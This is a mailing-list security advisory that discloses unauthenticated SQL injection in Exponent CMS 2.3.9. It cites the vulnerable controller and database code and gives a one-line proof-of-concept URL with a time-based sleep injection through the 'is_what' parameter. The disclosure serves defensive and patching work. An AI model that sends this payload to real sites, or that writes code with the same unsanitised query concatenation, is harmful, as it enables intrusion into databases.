Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [day] [month] [year] [list]
Date: Mon, 19 Sep 2016 13:46:34 +0800
From: east wu <ylgaaaaa@...il.com>
To: oss-security@...ts.openwall.com
Cc: cve-assign@...re.org
Subject: Exponent CMS 2.3.9 SQL injection vulnerabilities

https://github.com/exponentcms/exponent-cms/blob/master/framework/modules/
addressbook/controllers/addressController.php#L172

'is_what' parameter there is an injection without login


https://github.com/exponentcms/exponent-cms/blob/master/framework/core/subsystems/expDatabase.php#L559

$this->sql("UPDATE " . $this->prefix . $table . " SET " . $col . "=0 WHERE "
. $where);

POC:
/index.php?controller=address&action=activate_address&is_what=address1=(select
* from (select sleep(5))x)%23&id=1

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ